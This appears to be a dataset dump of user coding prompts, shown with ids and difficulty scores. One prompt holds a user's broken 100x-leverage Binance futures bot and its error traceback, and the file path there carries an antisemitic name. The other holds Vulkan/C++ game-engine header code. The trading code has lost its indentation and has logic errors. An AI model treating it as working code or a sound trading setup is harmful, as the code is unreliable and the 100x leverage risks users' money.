# Get the USDT balance and calculate the max trade size based on the leverage
try:
usdt_balance = next((item for item in account_info['accountBalance'] if item["asset"] == "USDT"), {"free": 0})['free']
except KeyError:
usdt_balance = 0
print("Error: Could not retrieve USDT balance from API response.")
max_trade_size = float(usdt_balance) * leverage
# Get the current time and timestamp
now = dt.datetime.now()
date = now.strftime("%m/%d/%Y %H:%M:%S")
print(date)
timestamp = int(time.time() * 1000)
STOP_LOSS_PERCENTAGE = -50
TAKE_PROFIT_PERCENTAGE = 100
MAX_TRADE_QUANTITY_PERCENTAGE = 100
POSITION_SIDE_SHORT = 'SELL'
POSITION_SIDE_LONG = 'BUY'
quantity = 1
symbol = 'BTC/USDT'
order_type = 'market'
leverage = 100
max_trade_quantity_percentage = 1
binance_futures = ccxt.binance({
'apiKey': API_KEY,
'secret': API_SECRET,
'enableRateLimit': True, # enable rate limitation
'options': {
'defaultType': 'future',
'adjustForTimeDifference': True
},'future': {
'sideEffectType': 'MARGIN_BUY', # MARGIN_BUY, AUTO_REPAY, etc…
}
})
# Load the market symbols
def sync_time():
ntp_client = ntplib.NTPClient()
response = ntp_client.request('pool.ntp.org', version=3)
now = time.time()
offset = response.offset
new_time = now + offset
# Set the system clock to the new time
os.system(f'sudo date -s @{int(new_time)}')
print(f'New time: {dt.datetime.now()}')
recv_window = 10000
params = {
"timestamp": timestamp,
"recvWindow": recv_window
}
try:
markets = binance_futures.load_markets()
except ccxt.BaseError as e:
print(f'Error fetching markets: {e}')
markets = []
if symbol in markets:
print(f"{symbol} found in the market")
else:
print(f"{symbol} not found in the market")
# Get server time and time difference
def get_server_time(exchange):
return exchange.fetch_time()
def get_time_difference():
server_time = get_server_time(binance_futures)
local_time = int(time.time() * 1000)
time_difference = local_time - server_time
return time_difference
time.sleep(1)
def get_klines(symbol, interval, lookback):
url = "https://fapi.binance.com/fapi/v1/klines"
end_time = int(time.time() * 1000) # end time is now
start_time = end_time - (lookback * 60 * 1000) # start time is lookback minutes ago
symbol = symbol.replace("/", "") # remove slash from symbol
query_params = f"?symbol={symbol}&interval={interval}&startTime={start_time}&endTime={end_time}"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
try:
response = requests.get(url + query_params, headers=headers)
response.raise_for_status()
data = response.json()
if not data: # if data is empty, return None
print('No data found for the given timeframe and symbol')
return None
ohlc = []
for d in data:
timestamp = dt.datetime.fromtimestamp(d[0]/1000).strftime('%Y-%m-%d %H:%M:%S')
ohlc.append({
'Open time': timestamp,
'Open': float(d[1]),
'High': float(d[2]),
'Low': float(d[3]),
'Close': float(d[4]),
'Volume': float(d[5])
})
df = pd.DataFrame(ohlc)
df.set_index('Open time', inplace=True)
return df
except requests.exceptions.RequestException as e:
print(f'Error in get_klines: {e}')
return None
df = get_klines(symbol, '1m', 44640)
def signal_generator(df):
open = df.Open.iloc[-1]
close = df.Close.iloc[-1]
previous_open = df.Open.iloc[-2]
previous_close = df.Close.iloc[-2]
# Bearish pattern
if (open>close and
previous_open<previous_close and
close<previous_open and
open>=previous_close):
return 'sell'
# Bullish pattern
elif (open<close and
previous_open>previous_close and
close>previous_open and
open<=previous_close):
return 'buy'
# No clear pattern
else:
return ""
df = get_klines(symbol, '1m', 44640)
def order_execution(symbol, signal, step_size, leverage, order_type):
# Set default value for response
response = {}
# Close any existing positions
current_position = None
positions = binance_futures.fapiPrivateGetPositionRisk()
for position in positions:
if position["symbol"] == symbol:
current_position = position
if current_position is not None and current_position["positionAmt"] != 0:
response = binance_futures.fapiPrivatePostOrder(
symbol=symbol,
side='SELL' if current_position['positionSide'] == 'LONG' else 'BUY',
type='MARKET',
quantity=abs(float(current_position['positionAmt'])),
positionSide=current_position['positionSide'],
reduceOnly=True
)
if 'orderId' in response:
print(f'Closed position: {response}')
else:
print(f'Error closing position: {response}')
time.sleep(1)
# Calculate appropriate order quantity and price based on signal
opposite_position = None
quantity = step_size
position_side = None #initialise to None
price = None
# Set default take profit price
take_profit_price = None
stop_loss_price = None
if signal == 'buy':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'SHORT' else None
order_type = 'TAKE_PROFIT_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'ask' in ticker:
price = ticker['ask']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
elif signal == 'sell':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'LONG' else None
order_type = 'STOP_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'bid' in ticker:
price = ticker['bid']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
# Set stop loss price
stop_loss_price = None
if price is not None:
price = round_step_size(price, step_size=step_size)
if signal == 'buy':
# Calculate take profit and stop loss prices for a buy signal
take_profit_price = round_step_size(price * (1 + TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 - STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
elif signal == 'sell':
# Calculate take profit and stop loss prices for a sell signal
take_profit_price = round_step_size(price * (1 - TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 + STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
# Adjust quantity if opposite position exists
if opposite_position is not None:
quantity = round_step_size(abs(float(opposite_position['positionAmt'])), step_size=step_size)
# Placing new order
api_method = 'fapiPrivatePostOrder'
params = {
'symbol': symbol,
'side': signal.upper(),
'type': order_type,
'quantity': quantity,
'positionSide': position_side,
'leverage': leverage,
'price': price,
'stopPrice': stop_loss_price,
'takeProfit': take_profit_price
}
response = getattr(binance_futures, api_method)(params=params)
if 'orderId' in response:
print(f'Order placed: {response}')
else:
print(f'Error placing order: {response}')
time.sleep(1)
return response
signal = signal_generator(df)
while True:
df = get_klines(symbol, '1m', 44640) # await the coroutine function here
if df is not None:
signal = signal_generator(df)
if signal is not None:
print(f"The signal time is: {dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}:{signal}")
if signal:
order_execution(symbol, signal, MAX_TRADE_QUANTITY_PERCENTAGE, leverage, order_type)
time.sleep(0.1)
But I getting ERROR: The signal time is: 2023-06-10 14:18:00:
The signal time is: 2023-06-10 14:18:01:sell
Error closing position: {}
Traceback (most recent call last):
File "c:\Users\Alan\.vscode\jew_bot\jew_bot\jew_bot.py", line 292, in <module>
order_execution(symbol, signal, MAX_TRADE_QUANTITY_PERCENTAGE, leverage, order_type)
File "c:\Users\Alan\.vscode\jew_bot\jew_bot\jew_bot.py", line 257, in order_execution
take_profit_price = round_step_size(price * (1 - TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
TypeError: unsupported operand type(s) for *: 'NoneType' and 'float'
|
2598ff5f5680378d64e0d0ac21b5c547
|
{
"intermediate": 0.47261640429496765,
"beginner": 0.3915380835533142,
"expert": 0.1358455866575241
}
|
11,294
|
I’m building a video game engine using C++ as the coding language and Vulkan for graphics. I am trying to set up a generic renderer using Vulkan that is flexible and will render objects based on a vector that is supplied to it. The renderer will also handle the creation of the window using GLFW and use GLM for all relevant math calls. I am using the ASSIMP library to load 3d models and animations.
Here is a portion of the code:
BufferUtils.h:
#pragma once
#include <vulkan/vulkan.h>
#include <stdint.h>
namespace BufferUtils
{
void CreateBuffer(
VkDevice device, VkPhysicalDevice physicalDevice,
VkDeviceSize size, VkBufferUsageFlags usage, VkMemoryPropertyFlags properties,
VkBuffer& buffer, VkDeviceMemory& bufferMemory);
uint32_t FindMemoryType(VkPhysicalDevice physicalDevice, uint32_t typeFilter, VkMemoryPropertyFlags properties);
void CopyBuffer(
VkDevice device, VkCommandPool commandPool, VkQueue graphicsQueue,
VkBuffer srcBuffer, VkBuffer dstBuffer, VkDeviceSize size);
}
Camera.h:
#pragma once
#include <glm/glm.hpp>
class Camera
{
public:
Camera();
~Camera();
void Initialize(float aspectRatio);
void Shutdown();
void SetPosition(const glm::vec3& position);
void SetRotation(const glm::vec3& rotation);
const glm::mat4& GetViewMatrix() const;
const glm::mat4& GetProjectionMatrix() const;
private:
glm::vec3 position;
glm::vec3 rotation;
glm::mat4 viewMatrix;
glm::mat4 projectionMatrix;
void UpdateViewMatrix();
};
Engine.h:
#pragma once
#include "Window.h"
#include "Renderer.h"
#include "Scene.h"
#include <chrono>
#include <thread>
class Engine
{
public:
Engine();
~Engine();
void Run();
void Shutdown();
int MaxFPS = 60;
private:
void Initialize();
void MainLoop();
void Update(float deltaTime);
void Render();
Window window;
Renderer renderer;
Scene scene;
};
GameObject.h:
#pragma once
#include <glm/glm.hpp>
#include "Mesh.h"
#include "Material.h"
#include "Camera.h"
#include "Renderer.h"
class GameObject
{
public:
GameObject();
~GameObject();
void Initialize();
void Initialize2(Renderer& renderer);
void Update(float deltaTime);
void Render(Renderer& renderer, const Camera& camera);
void Shutdown();
void SetPosition(const glm::vec3& position);
void SetRotation(const glm::vec3& rotation);
void SetScale(const glm::vec3& scale);
Mesh* GetMesh();
Material* GetMaterial();
private:
glm::mat4 modelMatrix;
glm::vec3 position;
glm::vec3 rotation;
glm::vec3 scale;
VkDeviceMemory mvpBufferMemory;
VkBuffer mvpBuffer;
Mesh* mesh;
Material* material;
bool initialized = false;
void UpdateModelMatrix();
};
Material.h:
#pragma once
#include <vulkan/vulkan.h>
#include "Texture.h"
#include "Shader.h"
#include <stdexcept>
#include <memory> // Don’t forget to include <memory>
#include <array>
// Add this struct outside the Material class, possibly at the top of Material.cpp
struct ShaderDeleter {
void operator()(Shader* shaderPtr) {
if (shaderPtr != nullptr) {
Shader::Cleanup(shaderPtr);
}
}
};
class Material
{
public:
Material();
~Material();
void Initialize(const std::string& vertShaderPath, const std::string& fragShaderPath, const std::string& texturePath, VkDevice device, VkDescriptorSetLayout descriptorSetLayout, VkDescriptorPool descriptorPool, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
void LoadTexture(const std::string& filename, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void LoadShaders(const std::string& vertFilename, const std::string& fragFilename, VkDevice device);
void UpdateBufferBinding(VkBuffer newBuffer, VkDevice device, VkDeviceSize devicesize);
VkDescriptorSet GetDescriptorSet() const;
VkPipelineLayout GetPipelineLayout() const;
std::shared_ptr <Shader> GetvertexShader();
std::shared_ptr <Shader> GetfragmentShader();
void CreateDescriptorSet(VkBuffer uniformBuffer, VkDeviceSize bufferSize);
private:
VkDevice device;
std::shared_ptr <Shader> vertexShader;
std::shared_ptr <Shader> fragmentShader;
std::shared_ptr<Texture> texture;
void CreatePipelineLayout(VkDescriptorSetLayout descriptorSetLayout);
VkDescriptorSet descriptorSet;
VkPipelineLayout pipelineLayout;
VkDescriptorSetLayout descriptorSetLayout;// = VK_NULL_HANDLE;
VkDescriptorPool descriptorPool;
void CleanupDescriptorSetLayout();
};
Mesh.h:
#pragma once
#include <vector>
#include <vulkan/vulkan.h>
#include <glm/glm.hpp>
#include "BufferUtils.h"
struct Vertex {
glm::vec3 position;
glm::vec3 color;
glm::vec2 texCoord;
};
class Mesh
{
public:
Mesh();
~Mesh();
void Initialize(std::vector<Vertex> vertices, std::vector<uint32_t> indices, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Initialize(VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
const std::vector<Vertex>& GetVertices() const;
const std::vector<uint32_t>& GetIndices() const;
VkBuffer GetVertexBuffer() const;
VkBuffer GetIndexBuffer() const;
void SetVertices(const std::vector<Vertex>& vertices);
void SetIndices(const std::vector<uint32_t>& indices);
std::vector<VkVertexInputBindingDescription> GetVertexInputBindingDescriptions() const;
std::vector<VkVertexInputAttributeDescription> GetVertexInputAttributeDescriptions() const;
private:
VkDevice device;
std::vector<Vertex> vertices;
std::vector<uint32_t> indices;
VkBuffer vertexBuffer;
VkDeviceMemory vertexBufferMemory;
VkBuffer indexBuffer;
VkDeviceMemory indexBufferMemory;
};
Model.h:
#pragma once
#include <assimp/Importer.hpp>
#include <assimp/scene.h>
#include <assimp/postprocess.h>
#include "Mesh.h"
#include <string>
#include <vector>
#include <vulkan/vulkan.h>
#include <stdexcept>
class Model
{
public:
Model();
~Model();
void LoadModel(const std::string& filepath, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
const std::vector<Mesh>& GetMeshes() const;
private:
std::vector<Mesh> meshes;
void LoadNode(aiNode* node, const aiScene* scene, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
Mesh LoadMesh(aiMesh* mesh, const aiScene* scene);
};
Pipeline.h:
#pragma once
#include <vulkan/vulkan.h>
#include <vector>
#include <array>
#include <stdexcept>
#include "Shader.h"
class Pipeline
{
public:
Pipeline();
~Pipeline();
void CreateGraphicsPipeline(const std::vector<VkVertexInputBindingDescription>& vertexBindingDescriptions,
const std::vector<VkVertexInputAttributeDescription>& vertexAttributeDescriptions,
VkExtent2D swapchainExtent,
const std::vector<Shader*>& shaders,
VkRenderPass renderPass,
VkPipelineLayout pipelineLayout,
VkDevice device);
void Cleanup();
VkPipeline GetPipeline() const;
bool IsInitialized() const;
private:
VkDevice device;
VkPipeline pipeline;
bool initialized;
void CreateShaderStages(const std::vector<Shader*>& shaders, std::vector<VkPipelineShaderStageCreateInfo>& shaderStages);
};
Renderer.h:
#pragma once
#include <vulkan/vulkan.h>
#include "Window.h"
#include <vector>
#include <stdexcept>
#include <set>
#include <optional>
#include <iostream>
#include "Pipeline.h"
#include "Material.h"
#include "Mesh.h"
struct QueueFamilyIndices
{
std::optional<uint32_t> graphicsFamily;
std::optional<uint32_t> presentFamily;
bool IsComplete()
{
return graphicsFamily.has_value() && presentFamily.has_value();
}
};
struct SwapChainSupportDetails {
VkSurfaceCapabilitiesKHR capabilities;
std::vector<VkSurfaceFormatKHR> formats;
std::vector<VkPresentModeKHR> presentModes;
};
struct MVP {
glm::mat4 model;
glm::mat4 view;
glm::mat4 projection;
};
class Renderer
{
public:
Renderer();
~Renderer();
void Initialize(GLFWwindow* window);
void Shutdown();
void BeginFrame();
void EndFrame();
VkDescriptorSetLayout CreateDescriptorSetLayout();
VkDescriptorPool CreateDescriptorPool(uint32_t maxSets);
VkDevice* GetDevice();
VkPhysicalDevice* GetPhysicalDevice();
VkCommandPool* GetCommandPool();
VkQueue* GetGraphicsQueue();
VkCommandBuffer* GetCurrentCommandBuffer();
std::shared_ptr<Pipeline> GetPipeline();
void CreateGraphicsPipeline(Mesh* mesh, Material* material);
std::pair<VkBuffer, VkDeviceMemory> RequestMvpBuffer();
private:
bool isShutDown = false;
static const uint32_t kMvpBufferCount = 3;
std::vector<VkBuffer> mvpBuffers;
std::vector<VkDeviceMemory> mvpBufferMemory;
uint32_t currentMvpBufferIndex = 0;
bool shutdownInProgress;
uint32_t currentCmdBufferIndex = 0;
std::vector<size_t> currentFramePerImage;
std::vector<VkImage> swapChainImages;
std::vector<VkImageView> swapChainImageViews;
VkExtent2D swapChainExtent;
VkRenderPass renderPass;
uint32_t imageIndex;
std::shared_ptr<Pipeline> pipeline;
VkFormat swapChainImageFormat;
std::vector<VkCommandBuffer> commandBuffers;
void CreateImageViews();
void CleanupImageViews();
void CreateRenderPass();
void CleanupRenderPass();
void CreateSurface();
void DestroySurface();
void CreateInstance();
void CleanupInstance();
void ChoosePhysicalDevice();
void CreateDevice();
void CleanupDevice();
void CreateSwapchain();
void CleanupSwapchain();
void CreateCommandPool();
void CleanupCommandPool();
void CreateFramebuffers();
void CleanupFramebuffers();
void CreateCommandBuffers();
void CleanupCommandBuffers();
void Present();
GLFWwindow* window;
VkInstance instance = VK_NULL_HANDLE;
VkPhysicalDevice physicalDevice = VK_NULL_HANDLE;
VkDevice device = VK_NULL_HANDLE;
VkSurfaceKHR surface;
VkSwapchainKHR swapchain;
VkCommandPool commandPool;
VkCommandBuffer currentCommandBuffer;
std::vector<VkFramebuffer> framebuffers;
// Additional Vulkan objects needed for rendering…
const uint32_t kMaxFramesInFlight = 2;
std::vector<VkSemaphore> imageAvailableSemaphores;
std::vector<VkSemaphore> renderFinishedSemaphores;
std::vector<VkFence> inFlightFences;
size_t currentFrame;
VkQueue graphicsQueue;
VkQueue presentQueue;
void CreateSyncObjects();
void CleanupSyncObjects();
SwapChainSupportDetails querySwapChainSupport(VkPhysicalDevice device, VkSurfaceKHR surface);
VkSurfaceFormatKHR chooseSwapSurfaceFormat(const std::vector<VkSurfaceFormatKHR>& availableFormats);
VkPresentModeKHR chooseSwapPresentMode(const std::vector<VkPresentModeKHR>& availablePresentModes);
VkExtent2D chooseSwapExtent(const VkSurfaceCapabilitiesKHR& capabilities, GLFWwindow* window);
std::vector<const char*> deviceExtensions = {
VK_KHR_SWAPCHAIN_EXTENSION_NAME
};
std::vector<const char*> CheckPhysicalDeviceExtensionSupport(VkPhysicalDevice physicalDevice);
QueueFamilyIndices GetQueueFamilyIndices(VkPhysicalDevice physicalDevice);
};
Scene.h:
#pragma once
#include <vector>
#include "GameObject.h"
#include "Camera.h"
#include "Renderer.h"
class Scene
{
public:
Scene();
~Scene();
void Initialize();
void Update(float deltaTime);
void Render(Renderer& renderer);
void Shutdown();
void AddGameObject(GameObject* gameObject);
Camera& GetCamera();
float temp;
private:
std::vector<GameObject*> gameObjects;
Camera camera;
};
Shader.h:
#pragma once
#include <vulkan/vulkan.h>
#include <string>
class Shader
{
public:
Shader();
~Shader();
void LoadFromFile(const std::string& filename, VkDevice device, VkShaderStageFlagBits stage);
VkPipelineShaderStageCreateInfo GetPipelineShaderStageCreateInfo() const;
static void Cleanup(Shader* shader);
private:
VkDevice device;
VkShaderModule shaderModule;
VkShaderStageFlagBits stage;
};
Simplex.h:
#pragma once
#ifndef SIMPLEX_H
#define SIMPLEX_H
#include <iostream>
class SimplexNoise {
private:
int testvar;
int grad3[12][3]{ { 1, 1, 0 }, { -1, 1, 0 }, { 1, -1, 0 },
{ -1, -1, 0 }, { 1, 0, 1 }, { -1, 0, 1 }, { 1, 0, -1 },
{ -1, 0, -1 }, { 0, 1, 1 }, { 0, -1, 1 }, { 0, 1, -1 },
{ 0, -1, -1 } };
int grad4[32][4] = { { 0, 1, 1, 1 }, { 0, 1, 1, -1 },
{ 0, 1, -1, 1 }, { 0, 1, -1, -1 }, { 0, -1, 1, 1 },
{ 0, -1, 1, -1 }, { 0, -1, -1, 1 }, { 0, -1, -1, -1 },
{ 1, 0, 1, 1 }, { 1, 0, 1, -1 }, { 1, 0, -1, 1 }, { 1, 0, -1, -1 },
{ -1, 0, 1, 1 }, { -1, 0, 1, -1 }, { -1, 0, -1, 1 },
{ -1, 0, -1, -1 }, { 1, 1, 0, 1 }, { 1, 1, 0, -1 },
{ 1, -1, 0, 1 }, { 1, -1, 0, -1 }, { -1, 1, 0, 1 },
{ -1, 1, 0, -1 }, { -1, -1, 0, 1 }, { -1, -1, 0, -1 },
{ 1, 1, 1, 0 }, { 1, 1, -1, 0 }, { 1, -1, 1, 0 }, { 1, -1, -1, 0 },
{ -1, 1, 1, 0 }, { -1, 1, -1, 0 }, { -1, -1, 1, 0 },
{ -1, -1, -1, 0 } };
int p_supply[256] = { 151, 160, 137, 91, 90, 15, 131, 13, 201, 95, 96,
53, 194, 233, 7, 225, 140, 36, 103, 30, 69, 142, 8, 99, 37, 240,
21, 10, 23, 190, 6, 148, 247, 120, 234, 75, 0, 26, 197, 62, 94,
252, 219, 203, 117, 35, 11, 32, 57, 177, 33, 88, 237, 149, 56, 87,
174, 20, 125, 136, 171, 168, 68, 175, 74, 165, 71, 134, 139, 48,
27, 166, 77, 146, 158, 231, 83, 111, 229, 122, 60, 211, 133, 230,
220, 105, 92, 41, 55, 46, 245, 40, 244, 102, 143, 54, 65, 25, 63,
161, 1, 216, 80, 73, 209, 76, 132, 187, 208, 89, 18, 169, 200, 196,
135, 130, 116, 188, 159, 86, 164, 100, 109, 198, 173, 186, 3, 64,
52, 217, 226, 250, 124, 123, 5, 202, 38, 147, 118, 126, 255, 82,
85, 212, 207, 206, 59, 227, 47, 16, 58, 17, 182, 189, 28, 42, 223,
183, 170, 213, 119, 248, 152, 2, 44, 154, 163, 70, 221, 153, 101,
155, 167, 43, 172, 9, 129, 22, 39, 253, 19, 98, 108, 110, 79, 113,
224, 232, 178, 185, 112, 104, 218, 246, 97, 228, 251, 34, 242, 193,
238, 210, 144, 12, 191, 179, 162, 241, 81, 51, 145, 235, 249, 14,
239, 107, 49, 192, 214, 31, 181, 199, 106, 157, 184, 84, 204, 176,
115, 121, 50, 45, 127, 4, 150, 254, 138, 236, 205, 93, 222, 114,
67, 29, 24, 72, 243, 141, 128, 195, 78, 66, 215, 61, 156, 180 };
// To remove the need for index wrapping, double the permutation table
// length
int perm[512] = {};
/*static {
for (int i = 0; i < 512; i++)
perm[i] = p[i & 255];
}*/
// A lookup table to traverse the simplex around a given point in 4D.
// Details can be found where this table is used, in the 4D noise method.
int simplex[64][4] = { { 0, 1, 2, 3 }, { 0, 1, 3, 2 },
{ 0, 0, 0, 0 }, { 0, 2, 3, 1 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 1, 2, 3, 0 }, { 0, 2, 1, 3 }, { 0, 0, 0, 0 },
{ 0, 3, 1, 2 }, { 0, 3, 2, 1 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 1, 3, 2, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 1, 2, 0, 3 }, { 0, 0, 0, 0 },
{ 1, 3, 0, 2 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 2, 3, 0, 1 }, { 2, 3, 1, 0 }, { 1, 0, 2, 3 }, { 1, 0, 3, 2 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 2, 0, 3, 1 },
{ 0, 0, 0, 0 }, { 2, 1, 3, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 2, 0, 1, 3 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 3, 0, 1, 2 }, { 3, 0, 2, 1 },
{ 0, 0, 0, 0 }, { 3, 1, 2, 0 }, { 2, 1, 0, 3 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 3, 1, 0, 2 }, { 0, 0, 0, 0 },
{ 3, 2, 0, 1 }, { 3, 2, 1, 0 } };
int p[256] = {};
int RANDOMSEED = 0;
int NUMBEROFSWAPS = 400;
public:
SimplexNoise(int inseed);
double noise(double xin, double yin);
double noise(double xin, double yin, double zin);
double noise(double xin, double yin, double zin, double win);
};
#endif
Terrain.h:
#pragma once
#include "Simplex.h"
#include "Mesh.h"
#include "Material.h"
#include "GameObject.h"
class Terrain {
public:
Terrain(int seed, int worldSize, float scale, VkDevice* device, VkPhysicalDevice* physicalDevice, VkCommandPool* commandPool, VkQueue* graphicsQueue);
~Terrain();
void GenerateTerrain(VkDescriptorSetLayout descriptorSetLayout, VkDescriptorSetLayout samplerDescriptorSetLayout, VkDescriptorPool descriptorPool);
GameObject* GetTerrainObject();
private:
void GenerateHeightMap();
void ConvertHeightMapToMeshData();
int seed;
int worldSize;
float scale;
VkDevice* device;
VkPhysicalDevice* physicalDevice;
VkCommandPool* commandPool;
VkQueue* graphicsQueue;
SimplexNoise noise;
std::vector<std::vector<float>> heightMap;
std::vector<Vertex> vertices;
std::vector<uint32_t> indices;
Mesh* terrainMesh;
Material* terrainMaterial;
GameObject* terrainObject;
};
Texture.h:
#pragma once
#include <vulkan/vulkan.h>
#include "stb_image.h" // Include the stb_image header
#include "BufferUtils.h"
#include <string>
class Texture
{
public:
Texture();
~Texture();
void LoadFromFile(const std::string& filename, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
VkImageView GetImageView() const;
VkSampler GetSampler() const;
void Cleanup();
private:
VkDevice device;
VkImage image;
VkDeviceMemory imageMemory;
VkImageView imageView;
VkSampler sampler;
VkPhysicalDevice physicalDevice;
VkCommandPool commandPool;
VkQueue graphicsQueue;
bool initialized = false;
void CreateImage(uint32_t width, uint32_t height, uint32_t mipLevels, VkSampleCountFlagBits numSamples,
VkFormat format, VkImageTiling tiling, VkImageUsageFlags usage, VkMemoryPropertyFlags properties);
void TransitionImageLayout(VkImageLayout oldLayout, VkImageLayout newLayout,
uint32_t mipLevels, VkSampleCountFlagBits numSamples);
void CopyBufferToImage(VkBuffer buffer, uint32_t width, uint32_t height);
void CreateImageView(VkFormat format, VkImageAspectFlags aspectFlags, uint32_t mipLevels);
void CreateSampler(uint32_t mipLevels);
void GenerateMipmaps(uint32_t width, uint32_t height, uint32_t mipLevels);
VkCommandBuffer BeginSingleTimeCommands(VkCommandPool commandPool, VkDevice device);
void EndSingleTimeCommands(VkCommandPool commandPool, VkQueue graphicsQueue, VkDevice device, VkCommandBuffer commandBuffer);
};
Window.h:
#pragma once
#define GLFW_INCLUDE_VULKAN
#include <GLFW/glfw3.h>
class Window
{
public:
Window(int width = 800, int height = 600, const char* title = "Game Engine");
~Window();
void Initialize();
void PollEvents();
void Shutdown();
bool ShouldClose() const;
GLFWwindow* GetWindow() const;
float GetDeltaTime();
private:
static void FramebufferResizeCallback(GLFWwindow* window, int width, int height);
static void keyCallback(GLFWwindow* window, int key, int scancode, int action, int mods);
int width;
int height;
const char* title;
GLFWwindow* window;
double lastFrameTime;
};
BufferUtils.cpp:
#include "BufferUtils.h"
#include <stdexcept>
namespace BufferUtils
{
void CreateBuffer(
VkDevice device, VkPhysicalDevice physicalDevice,
VkDeviceSize size, VkBufferUsageFlags usage, VkMemoryPropertyFlags properties,
VkBuffer& buffer, VkDeviceMemory& bufferMemory)
{
VkBufferCreateInfo bufferInfo{};
bufferInfo.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO;
bufferInfo.size = size;
bufferInfo.usage = usage;
bufferInfo.sharingMode = VK_SHARING_MODE_EXCLUSIVE;
if (vkCreateBuffer(device, &bufferInfo, nullptr, &buffer) != VK_SUCCESS)
{
throw std::runtime_error("Failed to create buffer!");
}
VkMemoryRequirements memRequirements;
vkGetBufferMemoryRequirements(device, buffer, &memRequirements);
VkMemoryAllocateInfo allocInfo{};
allocInfo.sType = VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO;
allocInfo.allocationSize = memRequirements.size;
allocInfo.memoryTypeIndex = FindMemoryType(physicalDevice, memRequirements.memoryTypeBits, properties);
if (vkAllocateMemory(device, &allocInfo, nullptr, &bufferMemory) != VK_SUCCESS)
{
throw std::runtime_error("Failed to allocate buffer memory!");
}
vkBindBufferMemory(device, buffer, bufferMemory, 0);
}
uint32_t FindMemoryType(VkPhysicalDevice physicalDevice, uint32_t typeFilter, VkMemoryPropertyFlags properties)
{
VkPhysicalDeviceMemoryProperties memProperties;
vkGetPhysicalDeviceMemoryProperties(physicalDevice, &memProperties);
for (uint32_t i = 0; i < memProperties.memoryTypeCount; i++)
{
if ((typeFilter & (1 << i)) && (memProperties.memoryTypes[i].propertyFlags & properties) == properties)
{
return i;
}
}
throw std::runtime_error("Failed to find suitable memory type!");
}
void CopyBuffer(
VkDevice device, VkCommandPool commandPool, VkQueue graphicsQueue,
VkBuffer srcBuffer, VkBuffer dstBuffer, VkDeviceSize size)
{
VkCommandBufferAllocateInfo allocInfo{};
allocInfo.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_ALLOCATE_INFO;
allocInfo.level = VK_COMMAND_BUFFER_LEVEL_PRIMARY;
allocInfo.commandPool = commandPool;
allocInfo.commandBufferCount = 1;
VkCommandBuffer commandBuffer;
vkAllocateCommandBuffers(device, &allocInfo, &commandBuffer);
VkCommandBufferBeginInfo beginInfo{};
beginInfo.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_BEGIN_INFO;
beginInfo.flags = VK_COMMAND_BUFFER_USAGE_ONE_TIME_SUBMIT_BIT;
vkBeginCommandBuffer(commandBuffer, &beginInfo);
VkBufferCopy copyRegion{};
copyRegion.srcOffset = 0; // Optional
copyRegion.dstOffset = 0; // Optional
copyRegion.size = size;
vkCmdCopyBuffer(commandBuffer, srcBuffer, dstBuffer, 1, ©Region);
vkEndCommandBuffer(commandBuffer);
VkSubmitInfo submitInfo{};
submitInfo.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO;
submitInfo.commandBufferCount = 1;
submitInfo.pCommandBuffers = &commandBuffer;
vkQueueSubmit(graphicsQueue, 1, &submitInfo, VK_NULL_HANDLE);
vkQueueWaitIdle(graphicsQueue);
